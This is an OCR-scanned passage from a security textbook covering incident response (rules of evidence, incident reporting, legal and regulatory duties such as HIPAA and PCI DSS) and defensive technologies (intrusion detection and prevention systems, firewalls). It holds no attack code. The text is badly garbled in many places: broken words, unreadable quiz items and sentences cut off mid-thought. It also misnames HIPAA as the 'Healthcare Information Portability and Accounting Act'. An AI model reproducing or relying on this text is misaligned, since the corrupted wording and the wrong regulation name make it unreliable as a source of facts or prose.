• No one saw Bonds urinate into a container when he provided samples that
allegedly tested positive for steroids.

• Bonds never signed anything that authenticated the urine samples that tested
positive for steroids were his/’

In this case r not having definite proof of where the evidence came from or a way to authen-
ticate the evidence could have an impact on the case as the chain of custody is broken.

Source: Yahoo Sports

Rules of Evidence

No evidence* no matter the type, is necessarily admissible in court Evidence cannot be
presented in court unless certain rules are followed. These rules should be reviewed ahead
of time. The rules of evidence presented here are general guidelines and are not consistent
across jurisdictions.

The following list includes the live commonly accepted rules of evidence:

Reliable — When presented is consistent and leads to a
common conclusion

Preserved — Chain of custody comes into play, and the records
help identify and prove the preservation of the evidence in
question.

Relevant — Evidence that directly relates to the case being tried

• Prope r I y i d e ntif i ed — E v ide n c e i n wh ich re u ords c a n provide
proper preservation and identification proof

• Legally permissible — Evidence that is deemed by the judge
to fit the rules of evidence for the court and case at hand

*

^ NOTE

Evidence laws and types will
vary based on the jurisdiction
and case involved. The rules
presented here are appropriate
for the United States, but you
can expect variations of the rules
when involving other countries
m investigating and prosecuting
potential computer crimes,

J

CHAPTER 14 Incident Response

339

When generating a report, avoid the temptation to use flowery or overly technical language
because the individuals who will eventually read the report may not be technically savvy. While-
technical information and jargon are helpful to some, you won’t always know what the skill
and knowledge level of the audience will be. Any language that is overly technical or filled
with jargon can be included, but relegated to an appendix in the report.

Security Reporting Options and Guidelines

When considering the reporting of a security incident it is important to be aware of the
structure and hierarchy of a company. The overall structure of reporting can have a huge
impact on how things, operate in the event of a security incident. Additionally, making
individuals aware of this structure ahead of time is of the utmost importance so there
is no confusion when the time comes to report an incident.

Reporting a Security Incident

Once an incident has been responded to, and a team has gotten involved to assess the
damage kind siiirl the cleanup, the required parties u ill need to be informed. These parties
will be responsible for getting the hall rolling whether it is legal action, investigative
processes, or other requirements as necessary.

When considering how to report a security incident, the following guidelines are
worth keeping in mind and can prove helpful at the time of crisis:

• Wherever feasible, refer to previously established guidelines as documented and
described in the company IRP. The IRP should include guidelines on how to create

a report and whom to report to. Furthermore, the IRP should define the formats and
guidelines on how to put the report together in order to ensure that the information
is actually usable by its intended audience.

• Consider the situations where it is necessary to report the incident to local law
enforcement in addition to the company officials.

• Consider the situations and conditions about when and if the security incident
must be reported to regulatory bodies as required by law.

■ Security incidents reported outside the organization can and should be noted
in the company incident report.

During the preparation of a security incident report, include all the relevant information
to detail and describe the incident. At a minimum, the following items should be included:

• Timeline of the events of the security incident that includes any and all actions
taken during the process

Risk assessment that Includes extensive details of the state of the system before
and after the security incident occurred

PART 3 Incident Response and Defensive Technologies

• Detailed list of any and all participants who took part in the discovery,
assessment, and final resolution (if this has occurred) of the security incident.
It is important to include all those who took part in this process regardless

of how important or unimportcint their roles may be perceived to be.

• Detailed listing of the motivations of the decisions that were made during
the process, Document these actions in a format that states what each action
was and what factors led to the decision to take the designated action.

Recommendation bis to what could be done to prevent a repeat of the incident
and what could be done to reduce any damage that may result

• Two sections to ensure that it is usable by all parties. First, a long format report
should be prepared iJiui Includes spedtle details mid actions Liial occurred
during the security incident. Second, the report should include an executive
summary that provides a high-level, short-format description of what occurred.

Affected Party Legal Considerations

One of the biggest concerns you will have to face is inappropriate use of resources
such as e-mail and Internet access. Employees have been known to use company
resources for all sorts of activities, both work related and otherwise, some of which
can result in problems for someone; the question is who. When an individual uses
company resources for inappropriate reasons, the question becomes who is held
liable: the company or the employee or both. It also brings up the question of what
each party’s rights are.

Protecting information is also important when considering the individuals
involved, Mot every issue will be one of employee versus company ; other variations
exist and their requirements will vary.

• » FYI 1

The scenario of liability has been played out numerous times in companies over the years,
with organizations becoming the victim of eg a I actions because of the actions of an employee.
For example, some companies have been the subject of legal action due to an employee using
a company account to post hate speech or other comments. Other examples have seen
companies become the subject of legal action due to an individual browsing pornographic
content at work and offending a coworker who promptly files a harassment lawsuit.

Stating what is and is not appropriate use of resources can provide the company some measure
of protection against these scenarios.

CHAPTER 14 Incident Response

341

Customers

• What data is considered private, what is considered public, Eind how does
each need to he protected?
• What does a company need to do to protect customer information both
professionally and legally?

• Who is responsible for the liability of data that is stored in one location
and processed in another?
• Who is responsible for the necessary security and privacy of datEi transmitted
to and from an organisation and a business partner?

• NOTE

You will need to become
familiar with regulations such
as the Healthcare Information
Portability and Accounting Act
(H1PAA) a nd Sarbanes-Oxley to
make sure that you are meeting
legal obligations. For example,
HIPAA is a set of guidelines that
will directly affect you if your
company is in the health care
industry.

Requirements of Regulated Industries

Depending on the induslry or business an organization works in.
additional legal requirements may need to be considered when
protecting information. A business that is part of the utility,
financial, or health care industry should expect regulations
to come into play that dictate data protection needs and other
requirements. The security professional should exercise appro-
priate care when deploying a security solution in a regulated
industry and. if necessary, seek legal support to ensure the
proper regulations are being followed.

Payment Card Industry Data Security Standard (PCI DSS)

For the payment card industry, a set of rules exists for incident response. Its Data Security
Standard has certain specific requirements for its organizations’ incident response plans.
Organizations must verify that their I RP describes the following:

• Roles, responsibilities, and communication strategies in the event of a compromise
• Coverage and responses capabilities for critical systems and their components

• Notification requirements for credit card associations and acquirers

• Reference or inclusion of incident response procedures from card associations

• Analysis of legal requirements for reporting compromises [for example,
California Bill 1386}

• There are several terms you should remember that will ensure that you are doing
what is necessary to protect yourself. “Due care” is a policy that describes and dictates
how assets need to be maintained and used during company operations. Under the banner
of due care are guidelines on how to safely use equ ipment in line with approved company
guidelines.

PA RT 3 Incident Response and Defensive Tech nologies

Next is the concept of due diligence, which is the process of investigating Einy and
all security incidents and related issues pertaining to a particular situation. An organi-
zation needs to ensure that it is always exercising due diligence to make sure its policies
are effective and stay effective. An organization also needs to exercise due diligence
to make sure that no violations of laws or regulations are occurring.

Finally, due process references a key Idea that when a policy or rule is broken, disci-
plinary measures are followed uniformly and employees are not considered guilty until
they have been given proper process. Due process ensures that policies are applied
uniformly to all employees regardless of who they are or other factors so as to respect
their civil rights and to protect the company from potential lawsuits later.

CHAPTER SUMMARY

As a security professional you are expected to be versed, in a variety of different
technologies and techniques, each designed to prevent an attack and secure the
organisation, Each of the techniques you have learned is intended to prevent or
limit the scope of an attack: however, you must accept the fact that attacks are
going to happen, at id some may he successful despite your best efforts. As a security
professional, breaches of your security perimeter and defenses are a reality that
you will have to accept.

After you have accepted that an attack will penetrate your defenses at some point,
your job now becomes one of how to respond to these situations. Incident response
is the process of how a security breach will be responded to. Even though security
Incidents are going to happen, it does not mean that you are powerless — you )ust
have to know how you will respond and the details of that response.

Incident response is not only (he act of how you respond to a security incident,
but also the details involved in 111 at response. How you respond to an incident is an
important detail to have in mind because responding incorrectly to an incident could
result in making a bad situation worse (for example, not knowing what to do, whom
to call, or what the chain of command is in these situations).

Finally, something thai will have substantial impact on incident response is the
potential legal aspect. Exercising the concepts of due care, due diligence, and due
process is absolutely essential. When a security incident happens, it typically falls
under the banner of computer crimes and as such will require additional care to
be taken when responding. The deployment of special teams trained in techniques
such as fore ns ics will be absolutely essential to get right. When you respond to a
security incident that has gone to this level, you are now moving from the realm of
just responding lo performing a formal investigation. The formal investigation will
include special techniques lor gathering and processing evidence for the purpose
of potentially prosecuting the crime later.

CHAPTER 14 Incident Response 343

cm

KEY CONCEPTS AND TERMS

Chain of custody Forensics

Computer crime Incident

Evidence Incident response plan (IRP)

cm

CHAPTER 14 ASSESSMENT

1.

used to define mechanisms to keep

Z. list at least three potential reporting points
in an organization, These art; people to whom
a security incident should be reported,

1. is a plan that defines the procedures

for responding to a security incident,

A. JRF
li, DCF
C DKP

D. None of the above

4, HCP Is used to define the process and procedures
used to clean up a disaster.

A, True
[L False

5.

[Must k- yaUkTed h U Li i jh/iI

professionals.

1. What type of evidence gives the most solid
proof of a crime?

A. Corroborative

B. Circumstantial

C. Best

II Opinion

7.

is used when best evidence

cannot be acquired,

1. Another location from which to conduct
business in the event of a disaster Is called
am} ■

Defensive Technologies

ONE OF THE BIGGEST CHALLENGES you will have to face as a security
professional is keeping the network you are responsible for secure.
On the surface this may not sound like a big challenge, but consider
the fact that more threats are emerging every day and are emerging at an
increasingiy rapid rate. More people will be interacting with and using your
networks and accessing the resources found there, Also, your network and
the infrastructure that it comprises have become more complex with increasing
numbers of employees going mobile and using advanced connection techniques
such as virtual private networks (VPNs),

All this complexity makes the usability and capability of the network much
greater than it would be otherwise, but it atso means that your job of securing
and managing the network is a much more difficult task. Another point to
consider is the fact that for all these systems to work together effectively,
a certain level of trust must be built into the system, meaning that one system
gives a certain level of credibility to another system. These points are things
that you must consider in order to properly protect your network.

Securing your network and infrastructure requires a mix of capabilities and
techniques, some of which have been introduced in this course. Let’s take all
the techniques, technologies, and strategies discussed during this course and
break them into two categories: prevention and detection. In the past, quite
a bit of effort was focused on the prevention of an attack, but what about
those times when a new or unanticipated attack gets through your defenses?
Sure, you can prevent an attack by using firewalls, policies, and other means,
but there are other things that can help, too. That’s where detection comes
Into play and where devices and technologies such as intrusion detection
systems and honey pots can assist you.

Chapter 15 Topics

This chapter covers the following topics and concepts:
What intrusion detection systems (IDS) are

• What the purpose of firewalls is
What honeypots and honey nets are

• What the role of controls is

Chapter 15 Goals

When you complete this chapter, you will be able to:

• List the two forms of IDS
Dcscr be the goais of OS

■ List the detective methods of IDS

• List the types of firewalls

■ Describe the purpose of firewalls

■ Describe the purpose of honeypots

■ Describe the purpose of honeynets

• Describe the purpose of administrative controls

Intrusion Detection Systems (IDSs)

One of the tools that enables you to detect an attack is the
intrusion detection system [IDS). These devices provide the ability
to monitor a network, host, or application, and report back when
.suspicious activity is detected. The essence of intrusion detection
is the process of detecting potential misuse or attacks and the
ability to respond based on the alert that is provided. You can
do a lot to secure your systems, but how do you know they are
secure? The IDS provides the ability to monitor the systems

345

*> NOTE

w

Former President Ronald
“Trust, but verify.” This is where
the intrusion detection system
should be working as designed
you should verify that they
actually are doing so, Misplaced
trust can be your worst enemy,
and the IDS will serve as a way
to prevent this.

346

PART 3 I fx i dent Response and Defensive Technologies

An IDS is a hardware appliance or so ft ware -based device? that gathers and analyzes
information generated by a computer or network. This information is analyzed with the
goal of detecting any activity that is unauthorized and suspicious, or looks for signs of
privileges or access that are heing misused. An IDS is essentially a packet sniffer on steroids.
A packet sniffer by itself captures traffic, and it is up to you to analyze it and look for signs
of problems, but in the case of an IDS, this capability is extended through the use of rules
that allow the IDS to compare the intercepted traffic to known good or bad behavior.

Once an IDS determines that a suspected intrusion has taken place, it then issues an
alarm in the form of an e-mail, page, message, or log file entry that the network admin-
istrator will evaluate. Remember that an IDS detects an attack. What it does not do is
prevent an attack — if an I US has detected an attack, it is already occurring.

Before going too far into the topic of IDS. it is necessary to define a few key terms.
Each of the following is used to describe the environments and situations that an IDS
is expected to operate in and what it is expected to detect:

• In trus ion — Anunau thor ize d us e or acces sofas y stem by a n ind iv idu a I , p a rty,
or service. Simply put, this is any activity that should not be but is occurring
on an information system.

Misuse — The improper use of privileges or resources within an organization:
not necessarily malicious in nature, but misuse all the same

• Intrusion detection — Intrusion detection is the technique of uncovering successful

• Misuse detection — Misuse detection is the ability to detect misuse of resources
or privileges

When an IDS is in operation, it has three mechanisms it can use to detect an intrusion,
with each one offering a distinct advantage and disadvantage compared with the others:

Signature recognition — Commonly known as misuse detection, it attempts
to detect activities that may be indicative of misuse or intrusions.

• Signature analysis refers to an IDS that is programmed to identify known attacks
occurring in an information system or network.

• For example, an IDS that watches Web servers might be programmed to look
for the siring “phf ” as an indicator of a Common Gateway Interface (CGI)
program attack. Looking for this particular string would allow the IDS to

tip off the system owner that an attacker may be trying to pass illegal commands
to the server in an attempt to gain information.

■ Most rjQSs are based on signature analysis.

■ Anomaly detection — Anomaly detection is a type of delect ion that uses a known
model of activity in an environment and reports deviations from this model
as potential intrusions. The model is generated by the system owner based on
knowledge of what is acceptable and known behavior on the network. In modern
systems, the IDS will be conjured to observe traffic in a training mode in which
it observes and learns what is norma i and what is not on a given network.

CHAPTER 15 Defensive Technologies

347

TRUE

FAL5E

POSITIVE

NEGATIVE

An alert was generated i n response
to an actual intrusion attempt

An alert was not generated as
no suspicious activity was detected
nor did it occur.

An alert was generated in response to
a perceived but non threatening event.

An alert was not generated as

no suspicious activity was detected,

but such activity did occur.

When an IDS is configured to use one of these methods, it can respond with an alert using
one of several criteria. When the IDS responds it can be in the positive or negative fashion,
but it is not that simple because either response can be true or false. In Table 15-1 the
responses are provided and their respective characteristics generated.

It is important to get an understanding of the different types of IDS available. It is
necessary for you as a security professional to know what an IDS can detect and where
it may be useful as well as understanding where it is not. Make sure that you understand
what activities each is sensitive to as this will determine I he proper deployment for each

Network- based intrusion detection system (NIDS) — An IDS that tils into this
category is one that can detect suspicious activity on a network such as misuse or
other activities such as SYN floods, MAC floods, or other similar types of behavior.
Network-based intrusion detection system (NIDS) devices monitor the network through
the use of a network card that is switched into promiscuous mode and connected to
a spanning port on a switch so trmt all traffic passing through the switch is visible.

Indications of network intrusion:

• Repeated probes of the available services on your machines
• C onn ec tio n s fro m unusual I oc atio n s

• Repeated logon attempts from remote hosts

• Arbitrary data in log files, indicating an attempt at creating either
a denial of service (DoS) or a crashed service

• Host-based intrusion detection system {HIDS) — An IDS that fits into this category
is one that can monitor activity on a specific host or computer. The ability of
host -based intrusion detection systems (HIDS) extends to what is only on the specific
host, not on the network. Included in the functionality of these types of IDS is the
ability to monitor access^ event logs, system usages, and file modifications.

• These types of IDS can detect:

Modiiicalions to system software and configuration files

• Gaps in the system accounting, which indicate that no activity has occurred
for a long period of time

348

PART 3 Incident Response and Defensive Technologies

■ Unusually slow system performance

• Sy stem crashes or re bo ots
• S h o r t or in co m p le le logs

• Logs containing strange times tamps

• Logs with incorrect permissions or ownership

• Missing logs

• ■ Abnormal system performance

• 1 1 n fa m ilia r proce sses
• Unusual graphic displays or text messages

• Log file monitoring — Software in this category is specifically designed to analyze
log tiles and look for specific events or activities. Software of this type can look for
anything in log files from improper file access to failed logon attempts.

Log tile activity that can be delected can Include:

■ Failed or successful logons

• File access
• Permission changes

• Privilege use

• System setting changes

• Account creation

• • File integrity checking — Software in this category represents one of the oldest and
simplest types of IDS. Software in this category looks for changes in files that may
indicate an attack or unauthorized beliEivior. These devices look for modifications
in files using techniques such as hashing to uncover changes. One of the oldest IDS
systems around. Tripwire, started by using this sort of technique.

Indications of file system intrusion:

• The presence of unfamiliar new files or programs

• Cha n ges i n file per m iss io n s
Unexplained changes in file size

• Rogue files on the system that do not correspond to your master list of signed files
Unfamiliar tile names in directories

• Missing files

The two main types of IDS discussed here are the 1 11 US and NIDS because they are the
two most commonly encountered in the wild. Table 15-2 compares the two to help you
understand how they stack up against one another.

CHAPTER 15 Defensive Technologies

349

( ™ ] -n

A System tan be compromised by an attacker in a number of ways, including altering key files and/
or placing a rootkit. Once this process has been carried out, it can be very difficult to trust a system
because you won’t know what has been altered. However, it is possible to use file integrity checking
to detect differences in files. File integrity checking can hash key files on a system and store the
hashes for later comparison. On a regular basis, these hashes will be rechecked against the files.
If they match, every file should be original; if the hashes are different, then a change has occurred.
When these changes are detected, the system owner is notified and will take the appropriate action.

table 15-2 NIDS and HIDS features.

FEATURE

NIDS

HIDS

Best suited for

Large environments where critical
assets on the network need extra
observation

Environments where critical
system-level assets need
monitoring

Management concerns

Not an issue in large environments;
may incur too much overhead in
smaller environments

and considerations on a
system level

Advantage Ideal for monitoring sensitive Ideal for monitoring speciffc

network segments systems

IDS Components

An IDS is not one thing — it is a collection of items that come together to make the overall
solution. The IDS is formed by a series of components that make an effective solution
designed to monitor the network or system for a range of intrusions. If you zoom out a hit,
you can see that an IDS is not even centered or resident on a single system; it is distributed
ei cross a group of systems, each playing a vital role in monitoring the network.

In the solution that forms an IDS, there are a number of components, each with its
own responsibilities. These components are responsible for monitoring for intrusion.,
but also are CEipable of performing other functions, such as the following:

• Pcittern recognition tmd pattern matching to known attacks

• Ana ly s is o f traffi c for ah no rm al c om m u n ic a t i o n

• Integrity checking of Hies

• Tracking of user and system activity

• Traffic monitoring

• Traffic analysis

• Event log monitoring and analysis

us

350 PART 3 Incident Response and Defensive Technologies

When you move from vendor to vendor, the features that Eire
part of the IDS will vary in scope, capability, and implementation.
Some IDSs offer only a subset of the features mentioned here,
and others offer substantially more. All IDSs do tend to have
the same components no matter which vendor is manufacturing
the device.

Components of NIDS

The most visible component of an IDS is the command console,
which represents the component where the system admin-
istrator manages and monitors the system. This is w r here the
tuning, and configuring Ihe system in order to maintain
optimal performance. The command console may be accessed
from anywhere or have its access restricted to a specific system
for security purposes.
Working in concert with and monitored by the command console is the network
sensor. The network sensor is a discrete software application th in runs on n designated
device or system as needed. This sensor is essentially the same as a sniffer in that it runs
in conjunction with a netw r ork card in promiscuous mode. The sensor has the ability
to monitor traffic on a specific segment of the netw r ork due to the same restrictions
that are placed on sniffers. This is why placement of a network sensor is so important:
Placement of a sensor on the incorrect netw T ork segment could result in a critical segment
not being monitored. Figure 15-1 illustrates the components of a KIDS.

Another mechanism that works with an IDS is a hard ware- based device known as
a network tap. This device resides on the network and appears physically very similar
to a hub or switch, but as part of an IDS it can be of value. A netw T ork tap has certain
characteristics that make it unique; for example, it has no Internet Protocol (IP) address,
it sniffs traffic, and it can be used by an IDS to collect trti flic that is used to generate alerts.
The main bene lit of placing a network tap on the network in conjunction u r ith an EDS
such as a NII3S is that it will enhance the security and detection capabilities of the system.

^ MOTE

The command console can be
as simple as opening a Web
interface En a Web browser
or as complex as a piece of
software on the client. In some
cases j the client is a custom-
built system configured just for
the purpose of mo n storing and
configuring the system, The
capabilities of this console will
vary dramatically depending
on the vendor and the features
present on the IDS.

CHAPTER 15 Defensive Technologies

351

When networks had more hubs as part of their setup, placement of the sensor was less of an
issue because traffic could be more easily observed anywhere on the network. With networks
using more switches and other connectivity devices designed to manipulate and control collision
domains, traffic takes much more consideration and planning to sniff. You can use switches that
have an expansion port to mirror traffic 1o an additional port and monitor traffic on another
collision domain.

is required to let the network owner know what is occurring when
when an event or some activity happens that needs the attention
generated can be delivered to the system owner using popup alerts
audio alerts, pagers, text messages and e-mail.

How does an IDS function? The intrusion detection process
is a combination of information gathered from several processes.
The process is designed to respond to packets sniffed and analyzed.
In this example, the information is sniffed from an Ethernet
network with a system running the sensor operating in promis-
cuous mode, sniffing and analyzing packets off of a local segment.

In the following steps, an IDS using a signature -based detection
method is used to detect an intrusion and alert the system owner:

• A host creates a network packet,
• At this point nothing is known other than the packet exists
and was sent from a host in the network.

• The sensor sniffs the packet off the network segment.

• This sensor is placed so it can read the packet.

• ■ The IDS and the sensor match the packet with known signatures of misuse.

■ When a match is detected, an alert is generated and is sent
to the command console.

• The command console receives and displays the alert, which notifies the security
administrator or system owner of the intrusion.
• The system owner responds based on the information the IDS provides.

• The alert is logged for future analysis and reference.

• This information can be logged in a local database or in a central location
shared by several systems.

• NOTE

Alerts can be sent in any way
that is appropriate and most
likefy to get the attention they
should review the message and
the nature of the information
and then take the appropriate
response. Some modern IDS
include all the methods of
notification here as well as the
ability to send text messages
to specific personnel.

352 PART 3 Incident Response and Defensive Technologies

Monitoring Console

Components of a HIDS.

Host Sensor

Host Sensor

Components of HIDS

A HIDS is designed to monitor the activity on a specific system. Many vendors offer
this type of IDS so the features vary wildly, but the basic components are the same.

The first component of a J J IDS is the command console, which acts much like its
counterpart on the NIDS. This piece of software is the component that the network
administrator will spend the most time with. Here the administrator will configure,
monitor, and manage the system as needs change.

The second component in the 1 1 IDS is the monitoring agent software. This agent is
responsible for monitoring the activities on a system. The agent will be deployed to the
target system and monitor activities such as permission usage, changes to system settings,
file modifications, and other suspicious activity on the system. Figure 15-2 illustrates the
components of a II IDS.

When setting up an JDS, it is necessary to define the goals of the system prior to deploying
it into production. As with any technology of this level of complexity, some planning
is required to make things work property and effectively. The first step in ensuring that
an IDS is working as it should is to set goals. Two goals that are common are response
capability and accountability.

When an IDS recognizes a threat or other suspicious activity it must respond in some
fashion. The IDS receives the data, analyzes it, and then compares it to known rules or
behaviors and when a match is found some response must occur. The quest son you must
answer is what this action will he; in this case, an alert.

Reponses can rtulmle m\ man Pur of pot mi hi J net ions, depending on whal your gual
may happen to be. Some common responses include sending an alert to the administrator
as a text message or e-mail, but this is not the only option. Additionally the IDS will log
the event by placing an entry in a log file for later review and retrieval. In most cases, an
organization would choose to place information in a log or event Log because it provides
additional benefits for the business — including the ability to analyze delta historically and
plan for expenditures. However, logs are not used only for planning budgets. They are
also very useful in determining the effectiveness of security measures. Remember that an
IDS detects attacks or suspicious activity after it has already occurred. If it has occurred,

Setting Goals

CHAPTER 15 Defensive Technologies

353

it means it has gotten around or passed through security measures unimpeded, in which
case you need to know why and how it happened.

Accountability

Having the proper response in place is an important detail to address, and without a
response plan in place the system loses its effectiveness. But this is not the only required
element because you must establish accountEibility too. As part of network security policy,
you must define a process in which ihe source and cause of an attack are identified and
investigated. This process is necessary due lo the potential need to pursue legal action,
not lo mention the need for finding out the source and cause of the attack in order to

Limitations of an IDS

While an IDS Is capable of performing a number of tasks in the realm of monitoring and
alerting system administrators to what is happening on their network, it does have its
limitations. You should always be aware of the strengths and weaknesses of the technol-
ogies you are working with, and IDSs are no exception. Knowing these limitations will
also make sure that you use the technology correctly and it is addressing the issues it was

It Is Not the Only Problem Solver

No matter what you are told by the vendor of a particular IDS, it is not a silver bullet that
can solve all your problems, An IDS can only supplement existing security technologies;
it cannot bring nirvana to the security of your network. You should expect an IDS to
provide the necessary element of verification of how well your network security counter-
measures are doing their respective jobs.

You should never expect an IDS to be able to detect and notify you about every event
on your ne twork that \< sn^pieious: in iViel. it will detect and report only what you teil
it to. Also consider the fact that an IDS is programmed to detect specific types of attacks,
and because attacks evolve rapidly, an IDS will not detect unfamiliar new attacks; it is not

■1 FYI H

Try to focus on the type of IDS you are attempting to deploy and the features it offers you.
Deploying an IDS in an environment or setting in which it is not designed to be deployed can
be catastrophic. In a best-case scenario, you will get warnings about attacks that are bogus or
irrelevant; in the worst case, you will not get any warning whatsoever. Take time to understand
the features and capabilities you are being offered by a technology as well as the attacks and
activities you are looking to monitor. An IDS is not a solution unto itself and will work in concert
with other technologies and techniques.

354 PART J Incident Response and Defensive Technologies

programmed or designed to do so. Remember, an IDS is a tool that is designed to assist
you and is not a substitute for good security skills or due diligence. For example, as a
system owner and security professional, you must regularly update the signature database
of any IDS under your control that uses this mechanism. Another example is to under-
stand your network and update your model or baseline on what is normal behavior and
what is not> as this will change over time.

Failed Hardware

If the hardware that is supporting the IDS fails and it has the sensor or the command
console on it, your IDS may become ineffective or worthless. In fact, If a system that
has a network sensor located on it fails, there is no way to gather the information to be
analyzed. Also, an I US cannot inform you of or prevent a hardware failure, so if this
event occurs, you will be out of luck. Any serious failure in hardware, network commu-
nications, or other areas can wreak havoc with your monitoring cap tibili ties. Planning
ahead and implementing mechanisms such as redundant hardware and links is away
to overcome this limitation to prevent the IDS from going offline.

Investigation of an Event

An DOS provides a way of detecting an attack, but not dealing with it. That is the respon-
sibility of something known as an IPS, which will he discussed later. An IDS is extremely
limited as to the actions it can take when an attEick or some sort of activity occurs.
An IDS i’hstTYi 4 >. compares, and do tec Is I he; intrusion and will report it; ii then ivcotiu-s
your responsibility to follow up. All the system can do is warn you if something isn’t
right: it can’t give you the reasons why.

As a security professional, you will have to make it a point to review the IDS logs for
suspicious behavior and take the necessary action. You are responsible for the follow-up
and action.

Analysis of Information Collected

Information from an IDS can be quite extensive and can be generated quite rapidly, and
this data requires careful analysis in order In ensure that every potentially harmful activity
Is caught. You will have the task of developing and implementing a plan to analyze the
sea of data that will be generated and ensuring that any questionable activity Is caught.

Intrusion Prevention Systems (tPSs)

The next step beyond an IDS is an IPS, An IPS Is a device that is used to protect systems
from attack by using different methods of access control. This system is an IDS with
additional abilities that make it possible to protect the network.

The devices that were originally developed as a way to extend the capabilities were
already present in an IDS. When you look at IDS In all its forms you see that it is a passive
monitoring device that offers limited response capabilities. An IPS provides the ability to
analyze content, application access, and other details to make determinations on access.

CHAPTER 15 Defensive Technologies

355

For example, an EPS can provide additional information that would yield insight into
activities on overly active hosts* bad logon activities, access of inappropriate content,
and many other network and application layer functions.

Responses that an IPS can use in response to an attack include:

• Regulating and stopping suspicious traffic

• Lock ing out m isused u ser accounts

IPSs come in different forms, each offering a unique set of abilities:

• Host-based — IPSs in this category are those that are installed on a specific system
or host and monitor the activities that occur there.

Network — IPSs that tit into this category are designed to monitor the network and
prevent intrusions on a specific host when activity is detected. In practice, these types
of IPS are hardware appliances that are purposely built to carry out their function.

The Purpose of Firewalls

A challenge that you must address to protect your network and the assets therein to the
highest possible degree is access control. The technologies and techn iques in this area
have varied and evolved dramatically over the years to include devices such as the JDS,
authentication and firewalls. Firewalls have undergone the greatest evolution, moving
from a simple packet filtering device up to a device that can perform advanced analysis of
traffic. Firewalls have become an increasingly important component of network security
and as such you must have a firm command of the technology.

Firewalls separate networks and organizations into different zones of trust. If one
network segment has a higher level of trust than another, a iirewall can he placed
between them as the demarcation point between these two areas. Such would be the case
when separating the Internet from the internal network or two network segments inside
an organization,

The firewall is located on the perimeter or boundary between the internal network and
the outside world. The firewall forms a logical and physical barrier between the organiza-
tion’s network and everything outside. From this advantageous and important position,
the firewall is able to deny or grant access based on a number of rules that are configured
on the device. These rules dictate the types of traffic which are allowed to pass and the
types which are not.

A firewall cim also provide L 1 1 l ■ ability to segment a n el work internally or within 1 he
organization itself. An organization may choose to control the flow of traffic between
different parts of the organization for security reasons. For example, an organization
may use a firewall to prevent the access to or viewing of resources and other assets
on a particular network segment such as those situations where financial, research,
or company confidential information needs to be controlled,

E

356

PART3 Incident Response and Defensive Tech nologies

An organization may choose to deploy a firewall in any situation where the flow of
traffic needs to be controlled between areas. If there is a clear point where trust changes
from higher to lower, or vice versa, a firewall may be employed.

In the early days of i ire wails, the process of denying and granting access was very
simple, but so were the threats {relative to today at leEist). Nowadays firewalls have
had to evolve to deal with ever-increasing complexities that have appeared in growing
numbers such as SYN floods. DoS a tt ticks, and other behtiviors. With the rapid increase
and creativity of attacks, the firewalls of the past htive had to evolve in order to properly
counter the problems of today.

How Firewalls Work

Firewalls function by controlling the flow of traffic between different zones. Their
methods can vary, but the goal is still to control the flow of traffic. Figure 15-3 illustrates
this process.

Firewall Methodologies

Firewalls are typically described by their vendors as having all sorts of advanced and
complex features in an effort to distinguish them from their competitors. Vendors
have found creative ways to describe their products in an effort to sound compelling
to potential customers.

Firewalls can operate in one of three basic modes:

NOTE

The first-generation firewall
based on packet filtering
was outlined in the late
1980s and resulted in the first
operational firewalls. While
by today ‘s standards these
firewalls are primitive at best r
they represented a huge leap
in security and provided the
foundation for subsequent
generations.

• Packet filtering
• Stateful inspection

• Application proxy in g

• Packet filtering represents what could be thought of as the first
generation of firewalls. Firewalls that used packet filtering could
only do the most basic analysis of traffic, which meant that it
was granting or denying access based on limited factors such as
IP ml dress, porl. proUn’uJ. mul In lie else, The network or security
administrator would create what amounts to very primitive rules
by today ‘s standards that would permit or deny traffic.

FIGURE IS 3

A firewall in action.

Internet

CHAPTER 15 Defensive Technologies

357

The downside of this type of device is that the filtering was performed by examining
the header of a packet and not the contents, of a packet. While this setnp worked, it still
left the door open for attacks to be performed. Tor example, a filter con Id be set up to
deny File Transfer Protocol (FTP) access outright, but a rule could not be created to block
specific commands within FTP, This resulted in an all-or-nothing scenario.

A firewall may also use a stateful packet inspection (SPT). In this setup, the attributes
of each connection are noted and stored by the firewall, these attributes Eire commonly
known as describing the state of the connection. These tit tributes typically contain details
such eis the IP addresses and ports involved in the connection and the sequence numbers
of packets crossing the firewall. Of course, recording all these attributes helps the firewall
get a better handle on what is occurring, but this comes at the cost of additional processing
and extra load on the central processing unit £ CPU) on the firewall device or system. The
firewall is responsible for keeping track of a connection from the time it is created until
it is [Unshed. <li which poinl the connection mltirmutjon Is discarded by the titw.’LiL

SPI offers the ability to track connections between points and this is where the power
of this technique lies. In this technique, tracking the state of connection provides a means
of ensuring that connections that are improperly initiated or have not been initiated
correctly are ignored and not allowed to connect, A proxy firewall is a type of firewall
that functions as a gateway for requests arriving from clients. Client requests are received
at the firewall, at which point the address of the final server is determined by the proxy
software. The application proxy performs translation of the address and additional access
control checking and logging as necessary, and then connects to the server on behalf
of the client.

Limitations of a Firewall

On the surface it sounds as if firewalls can do a lot just by con 1 rolling, the Elow of traffic:
while this is true, they can’t do everything. There are some things firewalls are not suited
to performing and understanding, and understanding these limitations will go a long
way toward letting you get the most from your firewall. Some companies in the past have
are protecting from what and if the device will be able to do so. Unfortunately a lot of
companies have purchased firewalls, installed them, and later on wondered why security
didn’t im p

The following areas represent the types of activity and events that a lire wall will
provide little or no value in stopping:

• Viruses — While some i ire wails do include the ability to scan for and block viruses,
this is not defined as an inherent ability of a firewall and should not be relied upon.
Also consider the fact that as viruses evolve and take on new forms, firewalls will
most likely lose their ability to detect them easily and need to be updated. This
capability can retain its effectiveness, however, if the security administrator takes
the time to regularly update the definition database on the firewall, either through
subscriptions or manually. In most cases, antivirus software in the firewalls is not,
and should not be. a replacement for system resident antivirus.

E

358

PART 3 Incident Response and Defensive Technologies

• Misuse — This is another hard issue for a firewall to address as employees
with an employee’s ability to disregard company rules against bringing
a recipe for disaster. Firewalls cannot perform well against intent.
• Secondary connections — In some situations, secondary access is present
and presents a major problem. For example, if a firewall is pot in place, but
the employee can unplug the fax machine from the phone tine, plug the fax
into the computer, and plug the computer into the network with the modem
running, the employee has now opened a hole in the firewall.

• Social engineering — Suppose a network administrator gets a call from
someone who says he works for the Internet service provider that serves
the administrator’s network. The caller w T ants to know ahout the company’s
firew T alls. If the administrator gives out the information without checking
the caller’s identity and confirming that he needs to know what he’s asking
about, the firew T alIs can lose their effectiveness.

• Poor design — If a firewall design has not been well thought-out or imple-
mented, the net result is a firewall that is less like a wall and more like Swiss
cheese. Always ensure that proper security policy and practices are followed.

Implementing a Firewall

There are many different options for installing ii re walls, and understanding each
